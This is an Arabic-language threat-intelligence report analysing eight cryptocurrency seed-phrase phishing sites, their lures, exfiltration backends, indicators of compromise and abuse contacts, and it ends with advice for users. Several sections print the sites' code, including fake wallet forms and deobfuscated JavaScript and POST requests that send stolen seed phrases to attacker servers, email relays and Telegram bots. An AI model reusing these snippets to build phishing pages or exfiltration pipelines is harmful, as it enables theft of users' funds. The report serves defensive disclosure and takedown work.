تحليل عمليات التصيد الاحتيالي المتعلقة بالعملات المشفرة:
تحليل 8 هجمات حقيقية
لقد اعترضنا حركة مرور حية متعلقة بالتصيد الاحتيالي، وقمنا بعملية الهندسة العكسية لخمسة برامج لسرقة عبارات البذور، وتتبّعنا البيانات المسروقة إلى روبوتات Telegram، وحسابات EmailJS، والأنظمة الخلفية لخدمات «التصيد الاحتيالي كخدمة».

ما توصلنا إليه
كل يوم، يفقد آلاف مستخدمي العملات المشفرة أموالهم بسبب مواقع التصيد الاحتيالي التي لا يمكن تمييزها عن خدمات المحافظ الشرعية. لكن ماذا يحدث خلف زر «Connect Wallet» المزيف؟ أين تذهب عبارة البذرة الخاصة بك فعليًّا؟
لقد اعترضنا حركة مرور HTTP المباشرة من 5 مواقع تصيد نشطة، وقمنا بتنزيل كودها المصدري الكامل، وتتبّعنا كل نقطة نهاية لتسريب البيانات حتى وجهتها النهائية. يكشف هذا التحقيق عن البنية الكاملة لعمليات التصيد الحديثة التي تستهدف العملات المشفرة — بدءًا من حيل الهندسة الاجتماعية التي تدفعك إلى كتابة عبارة البذرة الخاصة بك، وصولاً إلى روبوت Telegram الذي يرسلها إلى المهاجم في الوقت الفعلي.
جميع عبارات البذور الواردة في هذا المقال هي بيانات اختبار تم إنشاؤها عشوائيًا. ولم تتعرض أي بيانات اعتماد حقيقية للاختراق خلال هذا التحقيق. وقد تم الإبلاغ عن جميع المواقع إلى مزودي خدمات الاستضافة المعنيين وإلى أقسام مكافحة إساءة الاستخدام التابعة لهم.
نمط الهجوم الشامل
على الرغم من اختلاف العلامات التجارية والبنى الخلفية، فإن جميع مواقع التصيد الثمانية تتبع نفس المسار النفسي بالضبط:
النقطة الجوهرية: إن الرسوم المتحركة «جاري الاتصال...» تكون دائمًا مبرمج بشكل ثابت ليفشل. في شفرة المصدر للموقع رقم 4، وجدنا const success = false — لا توجد أي محاولة للاتصال بالمحفظة. ويهدف هذا المسار بأكمله حصريًّا إلى توجيه الضحايا نحو نموذج «الاتصال يدويًّا».

المواقع الثمانية: تحليل شامل
انتحال الشخصية
«بروتوكول لامركزي» خيالي للتحقق من صحة المحافظ. يستخدم شريط أسعار CryptoCompare المباشر وروابط إلى مستكشفات بلوكشين حقيقية (إيثريوم، BSC، Polygon، Avalanche، Solana، Cardano) لتعزيز المصداقية. تضم الصفحة الرئيسية أكثر من 100 شعار لمحافظ رقمية وعملية «التحقق» المكونة من 3 خطوات.
سلسلة التسريب المزدوجة
أكثر أنظمة الخلفية تطوراً من بين الخمسة جميعها — حيث يتم إرسال كل بيانات اعتماد مسروقة عبر قناتان مستقلتان في الوقت نفسه:
Victim submits seed phrase
|
+--> Channel 1: axios POST --> Express.js on Render.com
| |
| +--> Telegram Bot API --> @metatech2 (instant DM)
|
+--> Channel 2: fetch POST --> EmailJS API
|
+--> Bestgrace309@gmail.com (email backup) نتائج الاستخبارات المستمدة من المصادر المفتوحة (OSINT)
| المؤشر | القيمة |
|---|---|
| بريد إلكتروني احتيالي | Bestgrace309@gmail.com |
| روبوت Telegram | @DewdropsTG_bot (رقم التعريف: 7567323692) |
| مستلم رسالة Telegram | @metatech2 (معرّف الدردشة: 7350941887) |
| الخلفية | emailjs-backend-ovtg.onrender.com |
| خدمة EmailJS | service_d5qigxs / template_7bqxeaa |
| المجال المخفي | layerschain.in (من عملية إخفاء عنوان البريد الإلكتروني في CF) |
| الرسائل المرسلة | 1,824+ (من معرّف الرسالة في Telegram) |
| عمر النطاق | يومان (TLS: 25 مارس 2026) |
تم العثور على عنوان البريد الإلكتروني للمهاجم في تعليق في جافا سكريبت في الداخل config.js: // Bestgrace309@gmail.com. لقد نسوا إزالته قبل النشر. بالإضافة إلى ذلك، فإن الخادم الخلفي لـ Telegram مفتوح تمامًا — لا توجد مصادقة، ولا حدود للسرعة. من خلال فك تشفير Cloudflare's data-cfemail بالإضافة إلى التعتيم في كود HTML، اكتشفنا أيضًا عنوان بريد إلكتروني مخفيًّا: support@layerschain.in، متصلة ببنية تحتية لاستضافة المواقع في الهند وجنوب أفريقيا.
انتحال الشخصية
نسخة مطابقة تمامًا للواقع حتى على مستوى البكسل أكواليبري (AQLA) صفحة ترحيل الرموز. يحتوي كود HTML على علامة بيانات وصفية تكشف عن المصدر: data-scrapbook-source="https://token.aqla.app/migration"، بتاريخ 19 نوفمبر 2024.
نهج «صفر كود»
يتطلب هذا المهاجم لا يوجد أي كود من جانب الخادم. يتم إرسال النموذج مباشرةً إلى غير ثابت — نظام إدارة النماذج الشرعي للمواقع الثابتة. يتم إعادة توجيه كل إرسال إلى البريد الإلكتروني للمحتال. عنوان البريد الإلكتروني للمهاجم هو لا تظهر أبدًا في شفرة المصدر.
<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
<textarea name="phrase"></textarea>
<input name="private-key" />
<textarea name="keystore-json"></textarea>
<input name="password" />
</form>
Cloudflare Pages: مجاني. Un-static Forms: مجاني. لم يتم شراء أي نطاقات ولم يتم استئجار أي خوادم. إجمالي تكلفة البنية التحتية: صفر دولار.
انتحال الشخصية
يحتوي النطاق الفرعي على "safpal" — وهو خطأ إملائي متعمد في SafePal، وهي محفظة أجهزة شهيرة. يتظاهر الموقع بأنه "Blockchain Wallet Rectification" ويضم 26 فئة موضوعية مزيفة. ويستخدم Typed.js لـ تحريك أسماء السلاسل (إيثريوم، BSC، Polygon...) بالإضافة إلى شريط أخبار LiveCoinWatch لإضفاء المصداقية.
نفس المعدات، نفس المشغل؟
يستخدم نفس قالب التصيد بالضبط كما في الموقع رقم 2:
مطابق تمامًا connect.html، متطابق wallets.html مع أكثر من 60 شعارًا، ونفس البنية الخلفية لـ Un-static (مع معرّف نموذج مختلف — 6f1b82c3...da9943af). تشير هذه المجموعة المتطابقة بقوة إلى مشغل واحد يدير كلا الموقعين.
أخطاء في النص: "Privay Policy" (ينقص الحرف 'c')، "seperated" (يجب أن تكون "separated")، "Kestore" (ينقص الحرف 'y'). حقل كلمة المرور يستخدم type="text" بدلاً من type="password".
انتحال الشخصية
نسخة مطابقة تقريبًا من شبكة Flare البوابة — بلوكشين EVM حقيقي من الطبقة الأولى مزود ببروتوكولي FTSO و Data Connector. يحاكي أكثر من 30 شريكًا في النظام البيئي، بالإضافة إلى خصائص التنقل والعلامة التجارية. يتم تحميل أيقونات المواقع من موقع يستغل الأخطاء الإملائية: portal.flaremainet.com (ينقص حرف «n» واحد من كلمة «mainnet»).
التكرار المزدوج لـ EmailJS
الموقع الوحيد الذي يستخدم حسابان منفصلان على EmailJS في آن واحد لتوفير التكرار لمنع عمليات الإزالة:
// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4
// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
data: { service_id: 'service_isy47de',
template_id: 'template_dkk4d1b',
user_id: 'JsVEgXVcaSTro1etu' }
}) موضوع البريد الإلكتروني الخاص بكل حالة سرقة: "New Wallet Details from Flare".
يحتوي ملف HTML على مدير علامات جوجل (GTM-WX2D2TR), مايكروسوفت كلاريتي (j4bllybjkp), حماية Lunio من الدفع لكل نقرة (PPC)، و بكسل إعلانات Twitter/X. يقوم المهاجم بتشغيل الإعلانات المدفوعة لجذب الضحايا إلى موقع التصيد الاحتيالي وتصفية نقرات الروبوتات. هذه ليست مجرد هواية — إنها عملية ممولة تستند إلى التحليلات والإنفاق الإعلاني.

انتحال الشخصية
خدمة عامة باسم «COIN NODE» / «Wallet Fix» (بدون علامة تجارية محددة). حقوق النشر محفوظة لـ «Wallet Fix 2022» — يبلغ عمر قالب هذه المجموعة 4 سنوات على الأقل. الصور مستضافة على pumpeth.com (WordPress على AWS).
التصيد الاحتيالي كخدمة
البنية الخلفية الأكثر إثارة للقلق: أ واجهة برمجة تطبيقات متعددة المستأجرين تعتمد على UUID:
POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data
wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+... يحصل كل محتال على نقطة نهاية UUID خاصة به. ويقوم مشغل مركزي بإدارة واجهة برمجة التطبيقات (API)، وتتبع الحملات، وربما يحصل على حصة من الأموال المسروقة. وهذا هو سرقة العملات المشفرة على نطاق صناعي — نموذج «التصيد الاحتيالي كخدمة».
البنية التحتية ذات الصلة (معظمها معطلة)
| المجال | الدور | الحالة |
|---|---|---|
| api.pulseresolve.com | واجهة برمجة تطبيقات (API) للتسريب | NXDOMAIN |
| walletissuesfix.net | مضيف أيقونة الموقع | NXDOMAIN |
| syncwallet.online | مضيف الشعار | NXDOMAIN |
| pumpeth.com | شبكة توزيع المحتوى (CDN) للصور | مباشر (AWS) |
الخلفية معطلة، لكن الـ الواجهة الأمامية لا تزال قيد التشغيل على Cloudflare Pages. إذا قام المهاجم بإعادة التسجيل pulseresolve.com، يعود الموقع إلى العمل على الفور.
انتحال الشخصية
A عملية ذات شقين: «مركز الدعم» العام على wallet-support-39n.pages.dev مع 15 فئة إصدار مزيفة و39 علامة تجارية للمحافظ، بالإضافة إلى نسخة مطابقة تمامًا من عملية التسجيل في Ledger في ledger-recovery.support مستضاف على Replit — ويشمل اختيار طراز الجهاز، وإعداد رقم التعريف الشخصي (PIN)، وشبكة عبارة البذرة المكونة من 24 كلمة مع ميزة الإكمال التلقائي الحقيقية لـ BIP39.
الخلفية C2 لمكافحة الماسح الضوئي
تقوم صفحة دعم المحفظة بإرسال البيانات المسروقة إلى api.uranustoken.org/log — خادم تحكم (C2) مخصص يعمل بنظامي nginx وUbuntu خلف Cloudflare. الخلفية يقوم عمدًا بإسقاط جميع طلبات GET (تُرجع خطأ 522: انتهت مهلة الانتظار)، ولا تستجيب إلا لطلبات POST. وهذا يعني أن أدوات فحص عناوين URL، وروبوتات التصفح من Google Safe Browsing، والباحثين في مجال الأمن الذين يختبرون اتصال نقطة النهاية باستخدام طلب GET لا يرون شيئًا — فتبدو نقطة التحكم (C2) معطلة.
// config.js — C2 config exposed in plaintext
const config = {
serverURL: "https://api.uranustoken.org",
allowedWallets: ["phantom","solfare","metamask","trustwallet",
"coinbasewallet","ledger","trezor","okx","sui","backpack",
"tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;
// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
fetch(serverURL + "/log", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
})
} يعمل نسخة «Ledger» على تشغيل نظام خلفي منفصل يعمل بتقنية Express.js على منصة Replit نفسها: POST /api/recovery-phrase جمع {deviceId, pin, phrase}. وتُرجع 400 {"error":"Invalid data provided"} في حالة وجود مدخلات غير صحيحة — للتأكد من أن النظام الخلفي مباشر وقيد التحقق الفعلي البيانات المسروقة.
نتائج الاستخبارات المستمدة من المصادر المفتوحة (OSINT)
| المؤشر | القيمة |
|---|---|
| الواجهة الأمامية (المحفظة) | wallet-support-39n.pages.dev |
| الواجهة الأمامية (Ledger) | ledger-recovery.support (34.111.179.208) |
| الخلفية C2 | api.uranustoken.org → nginx/1.24.0 Ubuntu |
| عناوين IP من الفئة C2 | 104.21.60.163 / 172.67.198.35 (Cloudflare) |
| التحقق من Replit | a43d3852-5304-47af-a61b-f0f6f3912736 |
| مسجل | Name.com (ledger-recovery.support) |
| تم نشرها | 9 يناير 2026 (رأس «آخر تعديل») |
| مجموعة التقنيات | React + Vite + Tailwind الإصدار 4.1 + Framer Motion |
تحتوي حزمة JS التي يبلغ حجمها 466 كيلوبايت على قائمة الكلمات الكاملة لـ BIP39 بالنسبة لميزة الإكمال التلقائي في الوقت الفعلي، ظهرت كلمة «passphrase» 67 مرة، وكلمة «mnemonic» 39 مرة. يرشد نسخة «ليدجر» المزيفة الضحايا عبر نفس مسار التسجيل بالضبط الذي يتبعه جهاز «ليدجر» الأصلي — وهي الصفحة الأكثر إقناعًا في عملية التصيد الاحتيالي خلال هذا التحقيق بأكمله. الـ apiKey يشير الحقل الموجود في ملف التكوين إلى بنية PhaaS متعددة المستأجرين.
انتحال الشخصية
منصة إطلاق لامركزية عامة تتميز بـ 21 فئة من الطُعم (الاستثمار، الترحيل، إجراءات "اعرف عميلك" (KYC)، المسابقات، المطالبة بالمكافآت، استرداد الأصول، البيع المسبق، إصدار الرموز غير القابلة للاستبدال (NFT)، الحسابات المجمدة...) و أكثر من 70 علامة تجارية للمحافظ — إحدى أكثر قوائم المحافظ شمولاً التي صادفناها. والخطأ المطبعي الدال «Sychronize» (حيث ينقص الحرف «n») يكشف عن كونها مزيفة.
Pipeline «FormSubmit»
الاستخدامات FormSubmit.co — خدمة شرعية لإرسال النماذج عبر البريد الإلكتروني. تجزئة نقطة النهاية a2cf4131f1a5d39453c7c183df96f86f هو قيمة MD5 لعنوان البريد الإلكتروني الخاص بالمحتال. قمنا باختبار مئات أنماط عناوين البريد الإلكتروني عبر خدمات Gmail وYahoo وHotmail وProtonMail وYandex وMail.ru باستخدام طريقة الهجوم العشوائي — لا توجد نتائج مطابقة. يستخدم المحتال عنوان بريد إلكتروني غير شائع أو تم إنشاؤه عشوائياً.
// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
method: "POST",
dataType: "JSON",
data: {
dappWord: seedPhrase, // THE STOLEN SEED PHRASE
dappName: walletName, // Which wallet was selected
linkName: "DAPP DECENTRALIZED" // Campaign identifier
}
}); نتائج الاستخبارات المستمدة من المصادر المفتوحة (OSINT)
| المؤشر | القيمة |
|---|---|
| المجال | mainnetvalidationapp.pages.dev |
| هاش إرسال النموذج | a2cf4131f1a5d39453c7c183df96f86f |
| معرّف الحملة | DAPP اللامركزية |
| مجموعة FontAwesome | bdc3291137 (المجموعة رقم 112310842، الإصدار المجاني v6.7.2) |
| jQuery | تم تحميل الإصدارين 3.2.1 و3.5.1 في آن واحد |
| Bootstrap | CSS 5.2.2 + JS 5.3.0-alpha1 (تعارض) |
مجموعة FontAwesome bdc3291137 — يمكن لـ FontAwesome تحديد مالك الحساب المرتبط برقم تعريف هذه المجموعة. علامة الحملة DAPP DECENTRALIZED قد تظهر على مواقع تصيد أخرى تستخدم نفس التجزئة لـ FormSubmit. بعد سرقة عبارة البذرة، فإن رمز QR مزيف ورمز مرجعي عشوائي مكون من 7 أحرف يتم عرض الرسالة التالية: «اتصل بالمسؤول مع ذكر رمزك المرجعي الفريد» — مما يجعل الضحايا ينتظرون بدلاً من إجراء التحقيق.
انتحال الشخصية
غير معروف — كل من الواجهة الأمامية والخلفية غير متصلتين بالإنترنت. وبناءً على بنية الحمولة، كان هذا هجومًا لسرقة عبارة البذرة الخاصة بمحفظة العملات المشفرة. الـ المخزن العام لـ Cloudflare R2 (التخزين المادي، وليس «Pages») هو وسيلة تصيد موثقة جيدًا حيث تم تحديد أكثر من 5,000 صفحة ضارة، وأفادت شركة Netskope بزيادة في حركة المرور بمقدار 61 ضعفًا.
إعدادات «سكريبت كيدي»
الأكثر عملية أولية في هذه المجموعة. يتم إرسال عبارات البذور كلمة بكلمة إلى برنامج PHP يعمل على جهاز كمبيوتر منزلي أو خادم خاص افتراضي (VPS) عبر خدمة DNS مجانية:
POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded
pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
+%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
+%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
+%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access نتائج الاستخبارات المستمدة من المصادر المفتوحة (OSINT)
| المؤشر | القيمة |
|---|---|
| الواجهة الأمامية | pub-519769e9eb634616b1746c2018641d56.r2.dev [غير متصل] |
| الخلفية | mercifuljigga4real123.publicvm.com [NXDOMAIN] |
| معرّف دلو R2 | 519769e9eb634616b1746c2018641d56 |
| مزود خدمة DDNS | DNSExit.com / Netdorm, Inc. (سينسيناتي، أوهايو) |
| DNS NS | ns10–13.dnsexit.com |
| اسم المستخدم | mercifuljigga4real123 |
"Merciful" + "jigga" (لقب جاي-زي) + "4real" + "123" — اسم مستخدم ذو طابع شخصي واضح يشير إلى ارتباطه بثقافة الهيب هوب. لم يتم العثور عليه على أي منصة مدرجة في الفهرس: GitHub، أو X، أو Instagram، أو TikTok، أو Reddit، أو YouTube، أو Twitch، أو Steam. ومن المرجح أن يكون نشطًا على Discord، أو Telegram، أو منصات الألعاب تحت هذا الاسم أو بأسماء مشابهة له. اسم الملف fuc.php يتناسب مع أسلوب المقبض الجريء.
7 طرق لسرقة عبارة البذرة الخاصة بك

| الطريقة | المواقع | كيف يعمل | السرعة | التكلفة |
|---|---|---|---|---|
| روبوت Telegram | #1 | يقوم Express.js على Render.com بالاتصال بـ Bot API عبر خادم وسيط. ويتلقى المحتال رسالة خاصة فورية تحتوي على بيانات الاعتماد. | في الوقت الفعلي | $0 |
| EmailJS | #1, #4 | تُرسل جافا سكريبت من جانب العميل مباشرةً إلى API EmailJS، التي تقوم بدورها بتسليمها إلى البريد الإلكتروني الخاص بالمحتال. | ~1 دقيقة | $0 |
| النماذج غير الثابتة | #2, #3 | نموذج HTML قياسي يعمل بنمط POST موجه إلى خدمة نماذج شرعية تقوم بإعادة توجيه البيانات المرسلة عبر البريد الإلكتروني. | ~1 دقيقة | $0 |
| FormSubmit.co | #7 | jQuery AJAX إلى FormSubmit.co. عنوان البريد الإلكتروني مخفي خلف تجزئة MD5. الحملة مصنفة تحت وسم "DAPP DECENTRALIZED". | ~1 دقيقة | $0 |
| واجهة برمجة API C2 المخصصة | #6 | تقوم تطبيق React أحادي الصفحة (SPA) بإرسال الطلبات إلى واجهة برمجة التطبيقات (API) التي تعمل على nginx/Express خلف Cloudflare. يستبعد طلبات GET (522) لتفادي أجهزة الفحص. لا يستجيب إلا لطلبات POST. | في الوقت الفعلي | حوالي 5 دولارات شهريًّا |
| PHP + DDNS | #8 | برنامج PHP على جهاز كمبيوتر منزلي عبر خدمة DNS المجانية (publicvm.com). يتم إرسال عبارة البذرة كلمةً كلمةً. | في الوقت الفعلي | $0 |
| API تطبيقات PhaaS | #5 | واجهة برمجة تطبيقات (API) متعددة المستأجرين تعتمد على معرّف UUID. يقوم المشغل المركزي بإدارة البنية الخلفية، بينما يستأجر المحتالون نقاط النهاية. | في الوقت الفعلي | غير معروف |
7 علامات تحذيرية تكشف كل موقع تصيد احتيالي
إذا رأيت أي في هذه الحالات، أغلق علامة التبويب على الفور:
تستخدم الاتصالات الحقيقية بالمحافظ بروتوكول WalletConnect أو ملحقات المتصفح. ولا تظهر أبدًا رسالة الخطأ «فشل الاتصال» التي تطلب منك إدخال عبارة البذرة.
تؤدي كل أيقونة محفظة إلى النموذج نفسه. أما الخدمة الحقيقية فستقوم بدمج حزمة SDK الفعلية لكل محفظة.
إن ظهور «خطأ 503» أو «خطأ غير معروف» المزيف بعد الإرسال هو أمر متعمد. فقد تمت سرقة بياناتك بالفعل — وهذا الخطأ يهدف إلى خداعك لتجرب مرة أخرى باستخدام محفظة أخرى.
تستغل جميع المواقع الخمسة الخدمة المجانية لـ Cloudflare Pages. ولا يُشترط إجراء أي تحقق من الهوية. وقد ارتفعت حالات إساءة استخدام Cloudflare Pages في عمليات التصيد الاحتيالي بنسبة 198% في عام 2025.
لا توجد خدمة شرعية تحتاج إلى أنواع بيانات الاعتماد الثلاثة جميعها. ويُعد هذا النموذج ذو الألسنة الثلاثة من السمات المميزة لمجموعة أدوات التصيد الاحتيالي.
لا يتم تحميل أي من هذه المواقع ethers.js, web3.js، أو إجراء أي مكالمات RPC. إنها نماذج HTML بحتة تتظاهر بأنها تطبيقات لامركزية (dApps).
استضافة مجانية + خدمات نماذج مجانية + رسائل مجانية = عملية تصيد احتيالي كاملة مقابل 0 دولار. إذا لم يكن للموقع نطاق حقيقي، فكن حذراً.
جدول IOC الكامل
بالنسبة لفرق الأمن ومنصات معلومات التهديدات ومقدمي بلاغات إساءة الاستخدام:
النطاقات والبنية التحتية
| المجال | النوع | الحالة |
|---|---|---|
| networklayers.pages.dev | واجهة التصيد الاحتيالي | مباشر |
| token-aqla.pages.dev | واجهة التصيد الاحتيالي | مباشر |
| antiresolve-mysafpalnode.pages.dev | واجهة التصيد الاحتيالي | مباشر |
| flaremainnet.pages.dev | واجهة التصيد الاحتيالي | مباشر |
| swiftauthapps.pages.dev | واجهة التصيد الاحتيالي | مباشر |
| emailjs-backend-ovtg.onrender.com | الخلفية الخاصة بـ TG Relay | مباشر |
| portal.flaremainet.com | أصول «تايبوسكوات» | غير معروف |
| layerschain.in | المجال ذو الصلة | تعطل نظام أسماء النطاقات (DNS) |
| api.pulseresolve.com | البنية الخلفية لـ PhaaS | NXDOMAIN |
| walletissuesfix.net | مضيف الأصول | NXDOMAIN |
| syncwallet.online | مضيف الشعار | NXDOMAIN |
| pumpeth.com | شبكة توزيع المحتوى (CDN) للصور | مباشر (AWS) |
| wallet-support-39n.pages.dev | واجهة التصيد الاحتيالي | مباشر |
| ledger-recovery.support | التصيد الاحتيالي عبر Ledger (Replit) | مباشر |
| api.uranustoken.org | الخلفية C2 (nginx/Ubuntu) | مباشر |
| uranustoken.org | نطاق الجذر | 404 |
| mainnetvalidationapp.pages.dev | واجهة التصيد الاحتيالي | مباشر |
| pub-519769e9eb634616b1746c2018641d56.r2.dev | التصيد الاحتيالي (فئة R2) | غير متصل |
| mercifuljigga4real123.publicvm.com | الواجهة الخلفية لـ PHP (DDNS) | NXDOMAIN |
الحسابات والمعرّفات
| النوع | القيمة | الموقع |
|---|---|---|
| البريد الإلكتروني | Bestgrace309@gmail.com | #1 |
| البريد الإلكتروني (مخفي) | support@layerschain.in | #1 |
| روبوت Telegram | @DewdropsTG_bot (7567323692) | #1 |
| مستخدم Telegram | @metatech2 (7350941887) | #1 |
| EmailJS #1 | service_d5qigxs / I-7q0Bs-ilK3rFcWj | #1 |
| EmailJS #2 | service_6dt5h1k / Sza6lhzA9hKHrm1k4 | #4 |
| EmailJS #3 | service_isy47de / JsVEgXVcaSTro1etu | #4 |
| نموذج غير ثابت | c78173e2d991...94c3f76 | #2 |
| نموذج غير ثابت | 6f1b82c3ce55...da9943af | #3 |
| معرّف UUID لـ PhaaS | a26db20c-1dc4-4208-a60a-c2c3b22c02ef | #5 |
| GTM | GTM-WX2D2TR | #4 |
| MS Clarity | j4bllybjkp | #4 |
| مثيل العرض | rndr-id: ed83576e-b1b3-4c82 | #1 |
| التحقق من Replit | a43d3852-5304-47af-a61b-f0f6f3912736 | #6 |
| MD5 لإرسال النموذج | a2cf4131f1a5d39453c7c183df96f86f | #7 |
| وسم الحملة | DAPP اللامركزية | #7 |
| مجموعة FontAwesome | bdc3291137 (الطقم رقم 112310842) | #7 |
| معرّف دلو R2 | 519769e9eb634616b1746c2018641d56 | #8 |
| اسم المستخدم/DDNS | mercifuljigga4real123 | #8 |
أين يمكن الإبلاغ عن عمليات التصيد الاحتيالي المتعلقة بالعملات المشفرة

| الخدمة | ما الذي يجب الإبلاغ عنه | كيف |
|---|---|---|
| Cloudflare | 7 وحدات تخزين من نوع .pages.dev + وحدة تخزين واحدة من نوع R2 | abuse.cloudflare.com |
| Google Safe Browsing | جميع عناوين URL الخاصة بالتصيد الاحتيالي | الإبلاغ عن محاولة تصيد |
| PhishTank | جميع عناوين URL الخاصة بقائمة الحظر المجتمعية | phishtank.org |
| EmailJS | 3 حسابات تعرضت للاختراق (معرّفات الخدمة المذكورة أعلاه) | abuse@emailjs.com |
| غير ثابت | نقطتا نهاية النموذج 2 | الاتصال عبر موقع un-static.com |
| Render.com | الخلفية الخاصة بـ Telegram Relay | عرض نموذج الإبلاغ عن إساءة الاستخدام |
| Telegram | @DewdropsTG_bot + @metatech2 | telegram.org/support |
| جوجل (جيميل) | Bestgrace309@gmail.com | تقرير عن إساءة الاستخدام إلى Google |
| Twitter/X | حساب إعلاني يروج للموقع رقم 4 | تقرير عن إساءة استخدام الإعلانات X |
| FormSubmit.co | التجزئة a2cf4131... (#7) | نموذج الإبلاغ عن إساءة الاستخدام |
| Replit | ledger-recovery.support (رقم 6) | تقرير عن إساءة استخدام Replit |
| Name.com | مسجل موقع ledger-recovery.support | قسم مكافحة إساءة الاستخدام في Name.com |
| DNSExit | mercifuljigga4real123.publicvm.com | الإساءة على موقع dnsexit.com |
| FontAwesome | الطقم bdc3291137 (رقم 7) | إساءة استخدام FontAwesome |
| Chainabuse | جميع حملات التصيد الاحتيالي | Chainabuse.com |
كيف تحمي نفسك
لن تطلب منك أي خدمة شرعية أبدًا إدخال عبارة البذرة الخاصة بك في موقع إلكتروني. لا يتم إدخال عبارات البذرة إلا في برامج المحافظ الرسمية أثناء عملية استعادة المحفظة — ولا يتم إدخالها أبدًا على مواقع الويب التابعة لأطراف ثالثة المخصصة لـ«التحقق» أو «المزامنة» أو «الاستعادة».
قبل توصيل أي محفظة:
- تأكد من أن عنوان URL يتطابق مع النطاق الرسمي. تحقق من تفاصيل شهادة SSL.
- يستخدم تطبيق «Real WalletConnect» رمز QR أو رابطًا عميقًا — ولا يستخدم أبدًا نموذج عبارة البذرة.
- إذا «فشل الاتصال» وطُلب منك إدخال بيانات الاعتماد يدويًّا — فهذه محاولة تصيد.
- تحقق من عناوين URL المشبوهة على PhishTank أو VirusTotal قبل التفاعل.
- استخدم محفظة مادية — فهي تتطلب تأكيدًا ماديًا لكل معاملة.
- احفظ عناوين URL الرسمية في قائمة المفضلة. لا تنقر أبدًا على الروابط الواردة في الإعلانات أو الرسائل المباشرة أو وسائل التواصل الاجتماعي.
تصنيف عمليات التصيد الاحتيالي المتعلقة بالعملات المشفرة
لا يُعد سارقو عبارات البذور سوى فئة واحدة فقط. إليكم الصورة الكاملة لعمليات التصيد الاحتيالي في عالم العملات المشفرة — وسنقوم بإضافة تحليلات متعمقة لكل نوع.
الحقيقة المزعجة
تكاليف إعداد عملية تصيد احتيالي باستخدام العملات المشفرة $0 ويستغرق أقل من 30 دقيقة. استضافة مجانية، وخدمات النماذج المجانية، وروبوتات المراسلة المجانية. وقد قام المهاجم المسؤول عن الموقع رقم 1 بالفعل بجمع بيانات اعتماد من 1,824+ ضحية. الموقع رقم 4 قيد التشغيل الإعلانات المدفوعة على نطاق واسع. هذه ليست مسألة هواة — إنها صناعة. والدفاع الوحيد هو الوعي.
ساعدونا في التصدي لذلك
يقوم موقع PhishDestroy بتتبع مواقع التصيد الاحتيالي المتعلقة بالعملات المشفرة والإبلاغ عنها في الوقت الفعلي. إذا صادفت موقعًا مريبًا، فأبلغنا عنه — وسنقوم بالتحقيق في الأمر والعمل على إزالته.



